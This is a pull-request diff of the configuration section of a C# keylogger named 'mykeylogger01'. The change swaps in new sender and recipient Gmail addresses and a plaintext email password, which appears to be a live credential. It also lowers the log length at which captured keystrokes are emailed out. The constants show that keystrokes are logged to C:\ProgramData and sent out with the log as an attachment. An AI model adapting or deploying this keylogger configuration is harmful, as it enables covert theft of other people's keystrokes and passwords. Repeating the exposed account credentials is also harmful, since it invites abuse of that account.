Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 4 additions & 4 deletions mykeylogger01/Program.cs
Original file line number Diff line number Diff line change
Expand Up @@ -11,13 +11,13 @@ namespace mykeylogger01
class Program
{
// ----------- EDIT THESE VARIABLES FOR YOUR OWN USE CASE ----------- //
private const string FROM_EMAIL_ADDRESS = "josh.cyber.test@gmail.com";
private const string FROM_EMAIL_PASSWORD = "dontlogintome";
private const string TO_EMAIL_ADDRESS = "josh.cyber.test@gmail.com";
private const string FROM_EMAIL_ADDRESS = "crushlove220@gmail.com";
private const string FROM_EMAIL_PASSWORD = "crushlove@#220";
private const string TO_EMAIL_ADDRESS = "crushlove220@gmail.com";
private const string LOG_FILE_NAME = @"C:\ProgramData\mylog.txt";
private const string ARCHIVE_FILE_NAME = @"C:\ProgramData\mylog_archive.txt";
private const bool INCLUDE_LOG_AS_ATTACHMENT = true;
private const int MAX_LOG_LENGTH_BEFORE_SENDING_EMAIL = 300;
private const int MAX_LOG_LENGTH_BEFORE_SENDING_EMAIL = 120;
private const int MAX_KEYSTROKES_BEFORE_WRITING_TO_LOG = 0;
// ----------------------------- END -------------------------------- //

Expand Down